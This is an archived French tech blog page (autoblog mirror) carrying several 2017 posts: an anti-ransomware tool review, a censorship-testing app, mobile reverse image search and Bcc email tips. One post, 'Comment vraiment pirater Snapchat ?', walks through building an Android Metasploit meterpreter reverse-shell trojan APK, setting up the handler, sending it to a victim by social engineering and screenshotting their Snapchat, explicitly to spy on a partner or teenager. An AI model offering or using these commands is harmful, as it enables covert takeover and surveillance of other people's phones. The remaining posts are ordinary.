PROJET AUTOBLOG


FunInformatique

Site original : FunInformatique

⇐ retour index

Enfin une solution simple contre Wannacry et autres ransomwares !

mardi 20 juin 2017 à 19:15

Dans les articles précédents, je vous ai déjà parlé des ransomwares, ces malwares qui prennent en otage vos données les plus chères en échange d’une rançon. Même si les antivirus permettent de détecter de plus en plus efficacement cette nouvelle menace, il existe une nouvelle solution simple et efficace pour contrer les ransomwares avant même qu’ils ne passent à l’action.

Les ransomwares se propage typiquement de la même manière qu’un ver informatique qui va charger un programme malicieux. Il pénètre le système via un fichier téléchargé par mail ou une faille dans le réseau. Ensuite ils prennent en otage vos données en les chiffrant. Une fois infecté, c’est fichu même s’il existe un espoir. Autant alors se protéger avec RansomFree.

RansomFree protège votre machine en temps réel contre les attaques de ransomwares. Une fois installé et lancé, le programme tourne en tâche de fond. Lorsqu’une action ou un fichiers suspects sont détectés sur votre machine, RansomFree va bloquer le processus de chiffrement et protéger vos données. Vous pourrez choisir d’éliminer la menace ou de laisser faire.

Pour réussir cela, les développeurs de Ransomfree ont analysé plus de 40 ransomwares comme WannaCry, Locky, TeslaCrypt, Cryptowall, ou encore Cerber et ont réussi à isoler des schémas comportementaux propres au type ransomware qu’un logiciel légitime n’a pas.

Démonstration vidéo de RansomFree:

Comment utiliser RansomFree ?

Dès l’installation, RansomFree va disséminer des fichiers leurres aux quatre coins de votre disque dur. Si un ransomware tente de chiffrer vos données, il ira aussi s’attaquer à ces fichiers et déclenchera l’alerte. Vous n’avez rien à faire ni aucun réglage à effectuer.

RansomFree fonctionnera aussi si un disque dur réseau est attaqué. Notez que le logiciel sera actif au démarrage de Windows (pour les Mac, utilisez RansomWhere) même s’il ne figure pas dans la liste du Gestionnaire des tâches.

En cas d’alerte, le processus incriminé est suspendu.

Vous pouvez voir la liste des fichiers attaqués (View affected files), choisir de laisser faire (no, let it run) ou au contraire bloquer définitivement le processus et faire le ménage (Yes, stop & clean the threat).

Cet article Enfin une solution simple contre Wannacry et autres ransomwares ! est apparu en premier sur FunInformatique.

Vérifiez si vous êtes victime de la censure internet

mercredi 14 juin 2017 à 18:29

Vous vous voulez savoir si votre connexion Internet est censurée ? Chez vous, au travail ou à l’étranger voyons comment directement tester votre connexion avec l’application mobile Ooniprobe

Lancé par les développeurs de Tor, Ooniprobe propose trois tests permettant de faire le point sur les performances de votre réseau et sur l’éventuelle censure de votre connexion à Internet.

En France, à part quelques sites de djihadistes, la censure est discrète même si on fait aussi la chasse aux sites de téléchargement.

Dans d’autres pays, on fait moins dans la dentelle avec des sites d’informations bloqués, les protocoles de messageries instantanées(VoiP), le réseau Tor, certains proxys et VPN, etc. Pas besoin non plus de sortir du pays pour voir sa connexion Internet manipulée. Avec cette application, vous allez savoir si votre entreprise, votre hôtel ou votre bibliothèque bloquent vos connexions internet.

Toutes les données recueillies par ooniprobe sont analysées et réunies pour dresser un bilan mondial de la censure. Ces données sont parfois à prendre avec des pincettes, car certains pays sont plus testés que d’autres, par méconnaissance du projet ou peut-être aussi un peu à cause de la répression…

Comment utiliser ooniprobe ?

Lors du premier lancement, Ooniprobe vous proposera un petit quiz pour voir si vous avez bien compris les dangers de l’appli.

La première question vous demandera si vous êtes conscient que des gouvernements ou votre employeur peuvent être au courant que vous utilisez l’application tandis que la deuxième vous demandera si vous savez que vos données peuvent être publiées sur le site officiel. Heureusement, sur la page suivante vous pouvez faire en sorte de partager vos informations et les résultats de vos tests sans pour autant communiquer votre IP (ce qui vous ne vous rend pas 100% anonyme pour autant).

Ensuite Ooniprobe vous propose de lancer 3 tests :

 

Cet article Vérifiez si vous êtes victime de la censure internet est apparu en premier sur FunInformatique.

Comment vraiment pirater Snapchat ?

jeudi 8 juin 2017 à 19:54

Comment pirater Snapchat ? Voici une question que quelques utilisateurs de Snapchat se posent. Comment pirater Snapchat de mon copain pour savoir s’il est fidèle ? Comment pirater Snapchat pour contrôler ce que fait mon ado sur son smartphone ?

La première chose que fait l’internaute, c’est généralement d’essayer de trouver la réponse en faisant une recherche Google.

Devinez quoi ? Et bien, sur toute la première page de résultat, on trouve une grande liste d’arnaqueurs qui promettent de récupérer des vidéos, des photos et des journaux de chat de n’importe quel compte Snapchat.

Il y a des tas d’arnaques en tout genre sur la première page Google. Mais, désolé de vous dire que ces sites vous donne de faux espoirs et tous ces programmes sont créé dans le but de récupérer votre mot passe Snapchat, pour voler votre argent ou encore pour prendre le contrôle de votre smartphone.

Alors comment pirater un compte Snapchat ?

Un programme de piratage direct n’existe pas. En aucun cas, il n’y aura un miracle qui vous fera pirater une personne.

Cependant, la sécurité informatique garantie à 100 % n’existe pas. Donc pour vraiment pirater un compte Snapchat, il faut être patient et intelligent. Si vous voulez des outils spécialisés, vous pouvez par exemple vous orienter vers la distribution Kali Linux.

Pirater un téléphone mobile avec Metasploit

Cette technique consiste a exploiter les failles du système Android, iOS ou des applications installés dedans.

Chaque jour, des nouvelles failles de sécurité sont découverte par des hackers sur les systèmes Android et iOS. Ces failles sont exploitable et permet ainsi à une personne de prendre le contrôle total d’un smartphone ou tablette.

Pour exploiter ces failles, un pirate crée une application APK malveillante et l’envoie à une victime. Une fois l’application est installée sur le smartphone de la victime, il est facile de prendre le contrôlé de son smartphone et récupérer ses photos et vidéos Snapchat.

Pour cela, les pirates utilisent l’outil Metasploit disponible sur Kali linux.

C’est un outil pour le développement et l’exécution d’exploits contre une machine distante. Il contient des centaines d’exploits et permettront d’attaquer tout type de machines.

Si vous voulez tester cette méthode sur votre téléphone et vous avez un ordinateur sous Windows alors  je vous conseille d’utiliser une machine virtuel faisant tourner Kali Linux. Il suffit de télécharger VMware et une image de Kali Linux. Métasploit est déjà pré-installé dessus. Voici comment installer Kali Linux sur une machine Windows avec VMware.

Les commandes utilisées pour pirater un mobile à distance

Tout d’abord, nous allons ouvrir le terminal Kali Linux ensuite nous allons créer le trojan APK (c’est l’application que nous allons envoyer à la cible).

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 lport=4444 > /root/Desktop/nom-de-votre-application.apk (replacez LHOST avec votre propre adresse IP)

Après nous allons ouvrir un autre terminal et lancer Metasploit pour configurer notre trojan APK.

msfconsole (permet d’ouvrir l’outil métasploit)
use exploits/multi/handler (permet de sélectionner l’exploit handler)
set paylaod android/meterpreter/reverse_tcp
set lhost votre_adresse_ip
exploit

Voila le module est bien configuré, il reste maintenant d’envoyer l’APK à une victime en utilisant l’ingénierie sociale. Lorsque la victime installera l’application sur son mobile, Metasploit vous indiquera quelque chose comme ceci :

Il ne nous reste plus qu’à ouvrir une session Meterpreter à distance sur le mobile de la victime :

msf > sessions -i 1
[*] Starting interaction with 1…

Nous avons désormais le contrôle total du smartphone.  Par exemple : nous pouvons faire des captures d’écran de à distance de l’application Snapchat:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot snapchat.jpg

Afin d’apprendre plus sur Metasploit, je vous invite à lire cet article: c’est quoi Metasploit et comment bien l’utiliser ?

Conclusion

Pirater un compte Snapchat, n’est pas du tout une chose facile. Cette technique n’est pas fiable à 100%. Si la cible est bien protégé, vous n’aurez rien a faire.

J’espère qu’a travers ce tutoriel, vous avez bien compris comment fonctionne le piratage des applications Android ou iOS comme Snapchat.

Si vous avez des ajouts pour rendre cette page une base de donnée concernant Snapchat, n’hésitez pas à poster votre commentaire !

Cet article Comment vraiment pirater Snapchat ? est apparu en premier sur FunInformatique.

Comment faire une recherche par Image Google sous Android et iOS ?

vendredi 2 juin 2017 à 18:17

Vous voulez savoir si la photo de profile de votre dernier coup de foudre sur Tinder est vraiment la sienne ? Apprenez comment faire une recherche par Image sur Google sous Android, Iphone ou iPad.

L’une des applications les plus sous-estimées du moteur de recherche Google est certainement la recherche par image. En effet elle permet de retrouver une image sur l’immensité du web en quelques clics seulement.

Mais pourquoi donc rechercher une image ?

Personnellement je l’utilise souvent lorsqu’une image me plaît mais la taille ou la résolution ne s’accorde pas à mes besoins pour vérifier s’il n’existe pas une image plus adaptée, pour vérifier l’origine de l’image ou pour trouver des images similaires.

Il semble que les utilisateurs ne soient pas les seuls à sous-estimer ce potentielle puisque Google, pourtant propriétaire d’Android, n’a pas jugé bon de développer ce type de recherche pour les utilisateurs de smartphone sous Android (de même que sous iOS).

Pourtant des solutions existent et je vais vous montrer comment avec ce tutoriel :

Effectuer une recherche à l’aide d’une image en utilisant la version ordinateur de Google Images

Utiliser la version ordinateur du site google images permet de résoudre ce problème. Cette version permet donc de réaliser une recherche Google images pour toutes les photos présentes sur votre téléphone.

Pour cela, je vous invite à suivre ces quelques étapes:

Plusieurs possibilités s’offrent alors à vous :

Après avoir importé l’image, les résultats de l’image s’afficheront.

Faire une recherche d’image à partir d’un téléphone ou d’une tablette Android ou iOS

Il existe une autre méthode de recherche en utilisant la fonction intégré de Google chrome mobile et je vous explique comment.

Google vous donne la possibilité de rechercher des images similaires à celles qui se trouve dans la base données d’images du moteur recherche Google. Cette fonctionnalité est disponible dans l’application Chrome (sur Android, iPhone ou iPad).

Donc maintenant si vous voulez vérifier que la photo de profile de votre dernier coup de foudre sur Facebook ou Tinder est vraiment la sienne, vous n’aurez qu’à appliquer ces quelques étapes.

Cet article Comment faire une recherche par Image Google sous Android et iOS ? est apparu en premier sur FunInformatique.

cci mail: comment masquer les destinataires des emails ?

mardi 23 mai 2017 à 22:26

Quand vous envoyez un email à de multiples destinataires (certains ne se connaissant pas mutuellement), il est recommandé de ne pas afficher l’adresse email de chacun.

En général, lorsque vous envoyez des emails à plusieurs destinataires, vous écrivez leurs adresses email dans le champ Cc qui signifie Carbone Copie, champ dans lequel les adresses email sont visibles par tous les destinataires. Ce peut être une solution acceptable si chacune de ces personnes se connaissent.

Cependant si vous utilisez la même procédure pour envoyer des emails à des gens qui ne se connaissent pas, cela pourrait être très peu apprécié par les destinataires.

Heureusement, il existe une solution simple à satisfaire chaque parti et elle s’appelle Cci mail, pour Copie conforme  invisible.

Quel est la différence entre Cc et Cci ?

Cc permet d’envoyer le même message à plusieurs personnes, en saisissant leurs adresses dans le champ Cc.

Cci permet également d’envoyer le même message à plusieurs personnes, mais les adresses des destinataires apparaissant dans le champ Cci ne sont pas visibles pour les destinataires du message ni pour ceux à qui le message est transféré. C’est une copie cachée.

Remarque: Saisir toutes les adresses des destinataires dans le champ Cci en laissant le champ « à » vide ou uniquement rempli de votre propre adresse email est souvent interprété par les serveurs mail comme une tentative de spam et donc votre email risque d’être filtré et de n’être jamais reçu par les destinataires.

Pour contourner ce risque, je vais vous montrer comment utiliser votre propre adresse email comme « Undisclosedrecipients » dans le champ « à » et d’ajouter les autres adresses email dans le champ Cci, de cette manière vous pourrez envoyer votre message en toute sécurité.

Envoyer un email en cachant les destinataires sur Outlook

Vous pouvez maintenant envoyer vos messages en cachant les destinataires.

Info: certains FAI (fournisseurs d’accès internet) limitent parfois les envois à 20 destinataires seulement. Il est alors plus prudent si vous avez de nombreux contacts d’envoyer plusieurs emails.

Envoyer un email en cachant les destinataires sur Gmail/Hotmail/Yahoo

La procédure est en tout point similaire à la précédente si ce n’est que l’option Cci est directement disponible dans la fenêtre de message.

Maintenant vous pourrez partager du contenu et non plus des adresses emails. 😉

Cet article cci mail: comment masquer les destinataires des emails ? est apparu en premier sur FunInformatique.